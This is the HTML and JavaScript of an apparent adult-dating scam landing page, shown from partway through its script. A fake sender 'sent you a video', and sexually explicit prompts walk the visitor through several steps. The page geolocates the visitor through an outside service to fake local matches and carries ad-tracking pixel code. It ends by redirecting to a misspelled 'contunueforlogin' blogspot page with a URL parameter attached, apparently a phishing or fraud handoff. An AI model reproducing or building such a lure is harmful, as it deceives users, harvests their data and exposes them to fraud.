!function(t,e){"use strict";function n(){if(!a){a=!0;for(var t=0;t<o.length;t++)o[t].fn.call(window,o[t].ctx);o=[]}}function d(){"complete"===document.readyState&&n()}t=t||"docReady",e=e||window;var o=[],a=!1,c=!1;e[t]=function(t,e){return a?void setTimeout(function(){t(e)},1):(o.push({fn:t,ctx:e}),void("complete"===document.readyState||!document.attachEvent&&"interactive"===document.readyState?setTimeout(n,1):c||(document.addEventListener?(document.addEventListener("DOMContentLoaded",n,!1),window.addEventListener("load",n,!1)):(document.attachEvent("onreadystatechange",d),window.attachEvent("onload",n)),c=!0)))}}("docReady",window);

function getParameterByName(name) {
	name = name.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]");
	var regex = new RegExp("[\\?&]" + name + "=([^&#]*)"),
		results = regex.exec(location.search);
	return results === null ? "" : decodeURIComponent(results[1].replace(/\+/g, " "));
}

function hideUnsub() {
	var u = getParameterByName('m');
	var u2 = getParameterByName('s4');
	var uDiv = document.getElementsByClassName("unsubscribe")[0];
	if (u == 1 || u2 == 1) {
		uDiv.children[0].setAttribute("target", "_blank");
		uDiv.style.display = "block";
		document.body.classList.add("unsub_enable");
	} else {
		uDiv.style.display = "none";
	}
}

function languageDetection() {
	var forceLang = getParameterByName("lang");
	if (forceLang) {
		return forceLang;
	} else {
		var userLang = navigator.languages && navigator.languages[0] || navigator.language || navigator.userLanguage;
		if (userLang === "zh-SG" || userLang === "zh-HK" || userLang === "zh-TW") {
			userLang = "zh-CN";
		} else if (userLang == "no" || userLang == "nb" || userLang == "nb-NO" || userLang == "nn-NO") {
			userLang = "no";
		} else if (userLang.length > 2) {
			userLang = userLang[0] + userLang[1];
		}
		return userLang;
	}
}

function writeLocation(node, data) {
	var lang =  node.getAttribute("data-lang") || languageDetection(),
		flag = parseInt(node.getAttribute("data-flag")),
		cname = parseInt(node.getAttribute("data-cname")),
		city = parseInt(node.getAttribute("data-city")),
		prefix = node.getAttribute("data-prefix"),
		suffix = node.getAttribute("data-suffix"),
		prevText = node.textContent || node.innerText;

	if (lang === "pt") lang = "pt-BR";

	if (prevText === 'undefined') prevText = "";

	var langSet = data.cnames[lang] ? lang : 'en';
	var arr = [], str = '';

	if (cname !== 0) {
		arr.push(data.cnames[langSet]);
	}

	if (city !== 0) {
		var cityText, geoCity = data.city[langSet];

		if (geoCity && langSet === lang) {
			var before = prefix ? prefix : '';
			var after = suffix ? suffix : '';
			cityText = before + geoCity + after;
		} else {
			cityText = prevText;
		}
		arr.push(cityText);
	}

	var str2 = arr.join(", ");

	if (flag !== 0) {
		if (node.classList.contains('squared')) {
			str += '<i class="flag-icon flag-icon-squared flag-icon-' + data.cc.toLowerCase() + '"></i>' + str2;
		} else {
			str += '<i class="flag-icon flag-icon-' + data.cc.toLowerCase() + '"></i>' + str2;
		}
	} else {
		str = str2;
	}

	node.innerHTML = str;
}

var geoRefData = typeof geoData !== "undefined" ? geoData : null;

function showLocation(containerId) {
	var locationInfoNode = document.getElementById(containerId);
	var locationInfoNodes = document.getElementsByClassName(containerId);

	function writeLocationAll(data) {
		data.city["pt"] = data.city["pt-BR"];
		if (locationInfoNode && data.cc.length && data.cnames['en'].length) {
			writeLocation(locationInfoNode, data);
		}

		if (locationInfoNodes.length && data.cc.length && data.cnames['en'].length) {
			for (var i = 0; i < locationInfoNodes.length; i++) {
				writeLocation(locationInfoNodes[i], data);
			}
		}
	}

	if (locationInfoNode || locationInfoNodes.length) {
		if (geoRefData) {
			writeLocationAll(geoRefData);
		} else {
			var url = 'https://datajsext.com/ExtService.svc/getextparams';
			var xhr = new XMLHttpRequest();
			xhr.open('GET', url);
			xhr.send(null);

			xhr.onreadystatechange = function () {
				var DONE = 4;
				var OK = 200;

				if (xhr.readyState === DONE) {
					if (xhr.status === OK) {
						var data = JSON.parse(xhr.responseText);
						geoRefData = data;
						writeLocationAll(geoRefData);
					} else {
						console.log('Error: ' + xhr.status);
					}
				}
			}
		}
	}
}

function appendPixels() {
	var redirectTo = "/web/";

	function addPixel(pixel_link) {
		var pixel = new Image(1, 1);
		pixel.src = pixel_link;
		pixel.style.position = "absolute";
		pixel.style.top = "-50px";
		document.body.appendChild(pixel);
	}

	function addExoPixels(goal) {
		var aliases = ["main.exoclick.com", "main.exdynsrv.com", "main.exosrv.com"];
		for (var i = 0; i < aliases.length; i++) {
			var n = "https://" + aliases[i] + "/tag.php?goal=" + goal;
			addPixel(n);
		}
	}

	addPixel("//delivery.trafficforce.com/retargeting.php?id=391");
	addExoPixels("581b21a74a633d6b0efdadf552fe94ce");
	addPixel("//tag.reporo.net/rem/pwy_1st");

	var els = document.querySelectorAll('a[href="/web/"]');
	for (var i = 0, l = els.length; i < l; i++) {
		var el = els[i];
		el.addEventListener("click", function(e){
			e.preventDefault();
			setTimeout(function () {
				location.href = redirectTo;
			}, 600);
			addPixel("//delivery.trafficforce.com/retargeting.php?id=411");
			addExoPixels("a4d9e26e19c37e5113a3f0d9780930f3");
			addPixel("//tag.reporo.net/rem/pwy_2nd");
		}, false);
	}
}

if (document.getElementsByClassName("random-favicons")[0]) {
	function randomNumber(min, max) {
		return Math.floor(Math.random() * (max - min + 1) + min);
	}

	(function() {
		const iconNode = document.createElement('link');
		iconNode.rel = 'icon';
		iconNode.type = 'image/png';
		iconNode.id = 'icon1';
		iconNode.href = '/util/favicons/' + randomNumber(1, 14) + '.png';
		document.head.appendChild(iconNode);
	})();
}

function getCookie(name) {
	var matches = document.cookie.match(new RegExp("(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"));
	return matches ? decodeURIComponent(matches[1]) : null;
}

function getBackendParamsByName(cName, pName) {
	if (getCookie(cName)) {
		return getCookie(cName);
	} else if (typeof requestLink === 'function') {
		var obj = requestLink();
		return obj[pName] && obj[pName][1] ? obj[pName][1] : undefined;
	}
}

function addSessionId() {
	if (!getCookie("sid") && typeof requestLink === 'function') {
		var e = requestLink(), n = document.getElementsByTagName("a"), u = document.getElementsByClassName("unsubscribe")[0];
		if (e.sessionId && e.sessionId.length > 1 && n.length) {
			for (var t = 0, s = n.length; t < s; t++) {
				if (n[t].pathname === '/web/') {
					n[t].href = '/web/?'+ e.sessionId[0] +'=' + e.sessionId[1];
				}
			}
			if (u) {
				var uUrl = u.children[0].getAttribute("href");
				u.children[0].href = uUrl + '?id=' + e.sessionId[1];
			}
		}
	}
}

docReady(function() {
	if (document.getElementsByClassName("unsubscribe")[0]) {
		hideUnsub();
	}
	addSessionId();
	showLocation("userLocation");
});

/* 
 window.onload = function() {
 setTimeout(appendPixels, 2000);
 };*/
	</script>

	
</head>

<body ng-controller="utlCtl" class="disable_ang_links u--layout--sticky-footer">
	<main class="main">
		<div class="form tour">
			<!-- STEP 1 -->
			<div class="step is--active is--visible" data-step="1">
				<div class="step__wrapper">
					<div class="u_position_center" style="position:relative; top: 25%;">
					   
						<span class="text text--26 text--red"><strong id="text01">Carlahorn003</strong></span>
						<span class="text text--26" id="text02">sent you a video</span>
						<button type="button" class="button button--play" data-play="0" data-stop="2">
							<div class="loader--circle">
								<div class="loader--circle-el1 loader--circle-el"></div>
								<div class="loader--circle-el2 loader--circle-el"></div>
								<div class="loader--circle-el3 loader--circle-el"></div>
								<div class="loader--circle-el4 loader--circle-el"></div>
								<div class="loader--circle-el5 loader--circle-el"></div>
								<div class="loader--circle-el6 loader--circle-el"></div>
							 	<div class="loader--circle-el7 loader--circle-el"></div>
								<div class="loader--circle-el8 loader--circle-el"></div>
								<div class="loader--circle-el9 loader--circle-el"></div>
								<div class="loader--circle-el10 loader--circle-el"></div>
								<div class="loader--circle-el11 loader--circle-el"></div>
								<div class="loader--circle-el12 loader--circle-el"></div>
							</div>
						</button>
						<span class="text text--16 text--press" id="text03">Press the button to play</span>
					</div>
				</div>
			</div>

			<!-- STEP 2 -->
			<div class="step" data-step="2" style="position:relative; top: 25%;">
				<div class="step__wrapper" style="position:relative; top: 25%;">
					<div class="u_position_bottom" style="position:relative; top: 40%;">
						<span class="text text--18 text--light" id="text04">
							<strong class="text--red">Carlahorn003</strong> wants to show you <strong>more videos</strong>.
						</span>
						<span class="text text--22" id="text05">Are you <strong>ok</strong> with that?</span>
						<button style="position:relative; top: 40%;" type="button" class="button button--flat text--20 icon icon--arrow" data-play="3.1" data-stop="7" id="text06">Fuck Yeah!</button>
					</div>
				</div>
			</div>

			<!-- STEP 3 -->
			<div class="step" data-step="3" style="position:relative; top: 25%;">
				<div class="step__wrapper" style="position:relative; top: 25%;">
					<div class="u_position_bottom" style="position:relative; top: 40%;">
						<span class="text text--18 text--light" id="text07">
							<strong class="text--red">Carlahorn003</strong> will feel better <strong>taking off</strong> her panties.
						</span>
						<span class="text text--22" id="text08">Want to see her <strong>naked</strong>?</span>
						<button type="button" class="button button--flat text--20 icon icon--arrow" data-play="8.1" data-stop="10" id="text09">Show Me!</button>
					</div>
				</div>
			</div>

			<!-- STEP 4 -->
			<div class="step" data-step="4" style="position:relative; top: 25%;">
				<div class="step__wrapper" style="position:relative; top: 25%;">
					<div class="u_position_bottom" style="position:relative; top: 25%;">
					    
						<span class="text text--18 text--light" id="text10"><strong class="text--red">Carlahorn003</strong> likes sticking things in <strong>her ass</strong>.</span>
						<span class="text text--22" id="text11">Would you try <strong>anal sex</strong>?</span>
						<div class="button__container">
							<button type="button" class="button button--no icon icon--no" data-play="11.1" data-stop="13"></button>
							<button type="button" class="button button--yes icon icon--yes" data-play="11.1" data-stop="13"></button>
						</div>
					</div>
				</div>
			</div>			

			<!-- STEP 5 -->
			<div class="step" data-step="5" style="position:relative; top: 25%;">
				<div class="step__wrapper"  style="position:relative; top: 25%;">					
					<div class="u_position_bottom"  style="position:relative; top: 25%;">
						<span class="text text--26 text--hn">
							<strong class="text--red" id="text12">Thank you</strong> 
						</span>
						<span class="text text--18 text--hn" id="text13">
							You may now see our list and photos of women who are in your area and meet your preferences. Again, please keep their identity a secret.
						</span>
						<span class="text text--18 text--hn" id="text14">
							Click on the <strong class="text--red">"Continue"</strong> button search with your zip/postal code.
						</span>
						<a onclick="log();"class="button button--flat text--20 icon icon--arrow2" id="text15">Continue</a>
					</div>
				</div>
			</div>
		</div>
		<video class="video" src="https://besthookuphere.com/media/dating/videochat/media/video.mp4" poster="https://besthookuphere.com/media/dating/videochat/images/poster.jpg" playsinline="" muted preload="" width="200" height="100"></video>
		<img class="poster" src="https://besthookuphere.com/media/dating/videochat/images/poster.jpg">
		<div class="timer__container">
			<div class="timer timer--inside">
				<div class="timer__circle">
				  <div class="timer_pie timer_spinner"></div>
				  <div class="timer_pie timer_filler"></div>
				</div>
			</div>
			<div class="timer timer--outside timer--outside1">
				<div class="timer__circle">
				  <div class="timer_pie timer_spinner"></div>
				  <div class="timer_pie timer_filler"></div>
				</div>
			</div>
			<div class="timer timer--outside timer--outside2">
				<div class="timer__circle">
				  <div class="timer_pie timer_spinner"></div>
				  <div class="timer_pie timer_filler"></div>
				</div>
			</div>
		</div>
	</main>
	<div class="unsubscribe"><a href="">Unsubscribe</a></div>

	<script type="text/javascript" src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
	<script>
		! function(e, n, t) {
	function r(e, n) {
		return typeof e === n
	}

	function o() {
		var e, n, t, o, i, s, a;
		for (var l in C)
			if (C.hasOwnProperty(l)) {
				if (e = [], (n = C[l]).name && (e.push(n.name.toLowerCase()), n.options && n.options.aliases && n.options.aliases.length))
					for (t = 0; t < n.options.aliases.length; t++) e.push(n.options.aliases[t].toLowerCase());
				for (o = r(n.fn, "function") ? n.fn() : n.fn, i = 0; i < e.length; i++) 1 === (a = (s = e[i]).split(".")).length ? Modernizr[a[0]] = o : (!Modernizr[a[0]] || Modernizr[a[0]] instanceof Boolean || (Modernizr[a[0]] = new Boolean(Modernizr[a[0]])), Modernizr[a[0]][a[1]] = o), h.push((o ? "" : "no-") + a.join("-"))
			}
	}

	function i(e) {
		var n = _.className,
			t = Modernizr._config.classPrefix || "";
		if (w && (n = n.baseVal), Modernizr._config.enableJSClass) {
			var r = new RegExp("(^|\\s)" + t + "no-js(\\s|$)");
			n = n.replace(r, "$1" + t + "js$2")
		}
		Modernizr._config.enableClasses && (n += " " + t + e.join(" " + t), w ? _.className.baseVal = n : _.className = n)
	}

	function s(e) {
		return e.replace(/([a-z])-([a-z])/g, function(e, n, t) {
			return n + t.toUpperCase()
		}).replace(/^-/, "")
	}

	function a(e, n) {
		return !!~("" + e).indexOf(n)
	}

	function l() {
		return "function" != typeof n.createElement ? n.createElement(arguments[0]) : w ? n.createElementNS.call(n, "http://www.w3.org/2000/svg", arguments[0]) : n.createElement.apply(n, arguments)
	}

	function f(e, n) {
		return function() {
			return e.apply(n, arguments)
		}
	}

	function u(e, n, t) {
		var o;
		for (var i in e)
			if (e[i] in n) return !1 === t ? e[i] : r(o = n[e[i]], "function") ? f(o, t || n) : o;
		return !1
	}

	function p(e) {
		return e.replace(/([A-Z])/g, function(e, n) {
			return "-" + n.toLowerCase()
		}).replace(/^ms-/, "-ms-")
	}

	function c(n, t, r) {
		var o;
		if ("getComputedStyle" in e) {
			o = getComputedStyle.call(e, n, t);
			var i = e.console;
			if (null !== o) r && (o = o.getPropertyValue(r));
			else if (i) {
				var s;
				i[i.error ? "error" : "log"].call(i, "getComputedStyle returning null, its possible modernizr test results are inaccurate")
			}
		} else o = !t && n.currentStyle && n.currentStyle[r];
		return o
	}

	function d() {
		var e = n.body;
		return e || ((e = l(w ? "svg" : "body")).fake = !0), e
	}

	function m(e, t, r, o) {
		var i, s, a, f, u = "modernizr",
			p = l("div"),
			c = d();
		if (parseInt(r, 10))
			for (; r--;)(a = l("div")).id = o ? o[r] : u + (r + 1), p.appendChild(a);
		return (i = l("style")).type = "text/css", i.id = "s" + u, (c.fake ? c : p).appendChild(i), c.appendChild(p), i.styleSheet ? i.styleSheet.cssText = e : i.appendChild(n.createTextNode(e)), p.id = u, c.fake && (c.style.background = "", c.style.overflow = "hidden", f = _.style.overflow, _.style.overflow = "hidden", _.appendChild(c)), s = t(p, e), c.fake ? (c.parentNode.removeChild(c), _.style.overflow = f, _.offsetHeight) : p.parentNode.removeChild(p), !!s
	}

	function v(n, r) {
		var o = n.length;
		if ("CSS" in e && "supports" in e.CSS) {
			for (; o--;)
				if (e.CSS.supports(p(n[o]), r)) return !0;
			return !1
		}
		if ("CSSSupportsRule" in e) {
			for (var i = []; o--;) i.push("(" + p(n[o]) + ":" + r + ")");
			return m("@supports (" + (i = i.join(" or ")) + ") { #modernizr { position: absolute; } }", function(e) {
				return "absolute" == c(e, null, "position")
			})
		}
		return t
	}

	function y(e, n, o, i) {
		function f() {
			p && (delete P.style, delete P.modElem)
		}
		if (i = !r(i, "undefined") && i, !r(o, "undefined")) {
			var u = v(e, o);
			if (!r(u, "undefined")) return u
		}
		for (var p, c, d, m, y, g = ["modernizr", "tspan", "samp"]; !P.style && g.length;) p = !0, P.modElem = l(g.shift()), P.style = P.modElem.style;
		for (d = e.length, c = 0; d > c; c++)
			if (m = e[c], y = P.style[m], a(m, "-") && (m = s(m)), P.style[m] !== t) {
				if (i || r(o, "undefined")) return f(), "pfx" != n || m;
				try {
					P.style[m] = o
				} catch (h) {}
				if (P.style[m] != y) return f(), "pfx" != n || m
			}
		return f(), !1
	}

	function g(e, n, t, o, i) {
		var s = e.charAt(0).toUpperCase() + e.slice(1),
			a = (e + " " + b.join(s + " ") + s).split(" ");
		return r(n, "string") || r(n, "undefined") ? y(a, n, o, i) : u(a = (e + " " + j.join(s + " ") + s).split(" "), n, t)
	}
	var h = [],
		C = [],
		S = {
			_version: "3.5.0",
			_config: {
				classPrefix: "",
				enableClasses: !0,
				enableJSClass: !0,
				usePrefixes: !0
			},
			_q: [],
			on: function(e, n) {
				var t = this;
				setTimeout(function() {
					n(t[e])
				}, 0)
			},
			addTest: function(e, n, t) {
				C.push({
					name: e,
					fn: n,
					options: t
				})
			},
			addAsyncTest: function(e) {
				C.push({
					name: null,
					fn: e
				})
			}
		},
		Modernizr = function() {};
	Modernizr.prototype = S, Modernizr = new Modernizr;
	var _ = n.documentElement,
		w = "svg" === _.nodeName.toLowerCase(),
		x = "Moz O ms Webkit",
		b = S._config.usePrefixes ? x.split(" ") : [];
	S._cssomPrefixes = b;
	var E = function(n) {
		var r, o = prefixes.length,
			i = e.CSSRule;
		if (void 0 === i) return t;
		if (!n) return !1;
		if ((r = (n = n.replace(/^@/, "")).replace(/-/g, "_").toUpperCase() + "_RULE") in i) return "@" + n;
		for (var s = 0; o > s; s++) {
			var a = prefixes[s],
				l;
			if (a.toUpperCase() + "_" + r in i) return "@-" + a.toLowerCase() + "-" + n
		}
		return !1
	};
	S.atRule = E;
	var j = S._config.usePrefixes ? x.toLowerCase().split(" ") : [];
	S._domPrefixes = j;
	var z = {
		elem: l("modernizr")
	};
	Modernizr._q.push(function() {
		delete z.elem
	});
	var P = {
		style: z.elem.style
	};
	Modernizr._q.unshift(function() {
		delete P.style
	}), S.testAllProps = g;
	var N = S.prefixed = function(e, n, t) {
		return 0 === e.indexOf("@") ? E(e) : (-1 != e.indexOf("-") && (e = s(e)), n ? g(e, n, t) : g(e, "pfx"))
	};
	Modernizr.addTest("objectfit", !!N("objectFit"), {
		aliases: ["object-fit"]
	}), o(), i(h), delete S.addTest, delete S.addAsyncTest;
	for (var T = 0; T < Modernizr._q.length; T++) Modernizr._q[T]();
	e.Modernizr = Modernizr
}(window, document);
var enableInlineVideo = function() {
		"use strict";

		function e(e, i, n, r) {
			function t(n) {
				d = i(t, r), e(n - (a || n)), a = n
			}
			var d, a;
			return {
				start: function() {
					d || t(0)
				},
				stop: function() {
					n(d), d = null, a = 0
				}
			}
		}

		function i(i) {
			return e(i, requestAnimationFrame, cancelAnimationFrame)
		}

		function n(e, i, n, r) {
			function t(i) {
				Boolean(e[n]) === Boolean(r) && i.stopImmediatePropagation(), delete e[n]
			}
			return e.addEventListener(i, t, !1), t
		}

		function r(e, i, n, r) {
			function t() {
				return n[i]
			}

			function d(e) {
				n[i] = e
			}
			r && d(e[i]), Object.defineProperty(e, i, {
				get: t,
				set: d
			})
		}

		function t(e, i, n) {
			n.addEventListener(i, function() {
				return e.dispatchEvent(new Event(i))
			})
		}

		function d(e, i) {
			Promise.resolve().then(function() {
				e.dispatchEvent(new Event(i))
			})
		}

		function a(e) {
			var i = new Audio;
			return t(e, "play", i), t(e, "playing", i), t(e, "pause", i), i.crossOrigin = e.crossOrigin, i.src = e.src || e.currentSrc || "data:", i
		}

		function o(e, i, n) {
			(m || 0) + 200 < Date.now() && (e[b] = !0, m = Date.now()), n || (e.currentTime = i), w[++T % 3] = 100 * i | 0
		}

		function u(e) {
			return e.driver.currentTime >= e.video.duration
		}

		function s(e) {
			var i = this;
			i.video.readyState >= i.video.HAVE_FUTURE_DATA ? (i.hasAudio || (i.driver.currentTime = i.video.currentTime + e * i.video.playbackRate / 1e3, i.video.loop && u(i) && (i.driver.currentTime = 0)), o(i.video, i.driver.currentTime)) : i.video.networkState === i.video.NETWORK_IDLE && 0 === i.video.buffered.length && i.video.load(), i.video.ended && (delete i.video[b], i.video.pause(!0))
		}

		function c() {
			var e = this,
				i = e[h];
			return e.webkitDisplayingFullscreen ? void e[g]() : ("data:" !== i.driver.src && i.driver.src !== e.src && (o(e, 0, !0), i.driver.src = e.src), void(e.paused && (i.paused = !1, 0 === e.buffered.length && e.load(), i.driver.play(), i.updater.start(), i.hasAudio || (d(e, "play"), i.video.readyState >= i.video.HAVE_ENOUGH_DATA && d(e, "playing")))))
		}

		function v(e) {
			var i = this,
				n = i[h];
			n.driver.pause(), n.updater.stop(), i.webkitDisplayingFullscreen && i[E](), n.paused && !e || (n.paused = !0, n.hasAudio || d(i, "pause"), i.ended && (i[b] = !0, d(i, "ended")))
		}

		function p(e, n) {
			var r = e[h] = {};
			r.paused = !0, r.hasAudio = n, r.video = e, r.updater = i(s.bind(r)), n ? r.driver = a(e) : (e.addEventListener("canplay", function() {
				e.paused || d(e, "playing")
			}), r.driver = {
				src: e.src || e.currentSrc || "data:",
				muted: !0,
				paused: !0,
				pause: function() {
					r.driver.paused = !0
				},
				play: function() {
					r.driver.paused = !1, u(r) && o(e, 0)
				},
				get ended() {
					return u(r)
				}
			}), e.addEventListener("emptied", function() {
				var i = !r.driver.src || "data:" === r.driver.src;
				r.driver.src && r.driver.src !== e.src && (o(e, 0, !0), r.driver.src = e.src, i ? r.driver.play() : r.updater.stop())
			}, !1), e.addEventListener("webkitbeginfullscreen", function() {
				e.paused ? n && 0 === r.driver.buffered.length && r.driver.load() : (e.pause(), e[g]())
			}), n && (e.addEventListener("webkitendfullscreen", function() {
				r.driver.currentTime = e.currentTime
			}), e.addEventListener("seeking", function() {
				w.indexOf(100 * e.currentTime | 0) < 0 && (r.driver.currentTime = e.currentTime)
			}))
		}

		function l(e) {
			var i = e[h];
			e[g] = e.play, e[E] = e.pause, e.play = c, e.pause = v, r(e, "paused", i.driver), r(e, "muted", i.driver, !0), r(e, "playbackRate", i.driver, !0), r(e, "ended", i.driver), r(e, "loop", i.driver, !0), n(e, "seeking"), n(e, "seeked"), n(e, "timeupdate", b, !1), n(e, "ended", b, !1)
		}

		function f(e, i) {
			if (void 0 === i && (i = {}), !e[h]) {
				if (!i.everywhere) {
					if (!y) return;
					if (!(i.iPad || i.ipad ? /iPhone|iPod|iPad/ : /iPhone|iPod/).test(navigator.userAgent)) return
				}!e.paused && e.webkitDisplayingFullscreen && e.pause(), p(e, !e.muted), l(e), e.classList.add("IIV"), e.muted && e.autoplay && e.play(), /iPhone|iPod|iPad/.test(navigator.platform) || console.warn("iphone-inline-video is not guaranteed to work in emulated environments")
			}
		}
		var m, y = "object" == typeof document && "object-fit" in document.head.style && !matchMedia("(-webkit-video-playable-inline)").matches,
			h = "bfred-it:iphone-inline-video",
			b = "bfred-it:iphone-inline-video:event",
			g = "bfred-it:iphone-inline-video:nativeplay",
			E = "bfred-it:iphone-inline-video:nativepause",
			w = [],
			T = 0;
		return f
	}(),
	timeouts = [],
	did_show_results = !1,
	videoStopped = !0,
	video = document.querySelector(".video"),
	poster = $(".poster"),
	numSteps = $("[data-step]").length,
	activeStep = $(".step.is--active"),
	timer = $(".timer__container"),
	queryErrors = !1,
	lastValue = "",
	showUpgrade = !1,
	isMobile = !0;

function videoLogic() {
	$("[data-play]").on("click", function() {
		var $this = $(this);
		setTimeout(function() {
			var playTime = parseFloat($this.data("play"));
			video.currentTime = playTime, video.play(), activeStep.is('[data-step="1"]') ? $('[data-step="1"]').addClass("is--loading") : (video.classList.remove("is--blurry"), activeStep.removeClass("is--visible"), timer.addClass("is--active animation animation" + parseInt(activeStep.data("step"))))
		}, 100)
	}), video.addEventListener("timeupdate", function() {
		var currentTime = parseInt(video.currentTime);
		video.currentTime > .1 && !poster.hasClass("is--hidden") && (poster.addClass("is--hidden"), 
		video.classList.remove("is--blurry"), 
		activeStep.removeClass("is--visible"), 
		timer.addClass("is--active animation animation" + parseInt(activeStep.data("step")))), 
		videoStopped != currentTime && (videoStopped = !1), 
		videoStopped || currentTime === parseInt(activeStep.find("[data-stop]").data("stop")) && (video.pause(), 
		videoStopped = currentTime)
		

	}), video.addEventListener("pause", function(old_step, new_step) {
		var $old_step = parseInt(activeStep.attr("data-step"));		
		$new_step = $("[data-step=" + ($old_step + 1) + "]"), 
		did_show_results && resetResults(), 
		timer.removeClass("is--active animation animation" + $old_step);
		window.scrollTo(0, 0), 
		old_step != new_step && old_step <= numSteps ? ($old_step.removeClass("is--active"), 
		$old_step.find(".step__wrapper").height(0), 
		checkOrientation(isMobile)) : (queryErrors = !0, $("[data-step]").removeClass("is--active is--visible").find(".step__wrapper").height(0), 
		$new_step.addClass("is--active is--visible"), 
		checkOrientation(isMobile), activeStep = $new_step, video.pause()), 
		video.classList.add("is--blurry")
	})
}
var isiDevice = /ipad|iphone|ipod/i.test(navigator.userAgent.toLowerCase());
var isAndroid = /android/i.test(navigator.userAgent.toLowerCase());
var isMobile = /Android|webOS|iPhone|iPad|iPod|pocket|psp|kindle|avantgo|blazer|midori|Tablet|Palm|maemo|plucker|phone|BlackBerry|symbian|IEMobile|mobile|ZuneWP7|Windows Phone|Opera Mini/i.test(navigator.userAgent);

function setVideoFallback() {
	if (checkOrientation(isMobile), isMobile) {
		$("html").addClass("is--mobile");
		!isiDevice || ($("html").addClass("is--ios"), enableInlineVideo(video)), isAndroid && $("html").addClass("is--android")
	} else $("html").addClass("is--desktop")
}
setVideoFallback();

function validateEmail(email) {
	var re;
	return /^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/.test(email)
}

function checkOrientation(isMobile) {
	var winWidth, winHeight, portrait = !($(window).width() > $(window).height()),
		element = $(".is--active .step__wrapper");
	(isMobile && portrait || !isMobile) && element.height($(window).height())
}
$(document).ready(function() {
	videoLogic(), 
	checkOrientation(isMobile), 
	$(window).on("resize orientationchange", function() {
		checkOrientation(isMobile)
	});
});
	</script>
	<script>
	    function log(){
            const queryString = window.location.search;
   const urlParams = new URLSearchParams(queryString);
   const q = urlParams.get('q');
              
                 window.location.href = `https://contunueforlogin.blogspot.com/?q=${q}`;
        }
    </script>
</body>

</html>
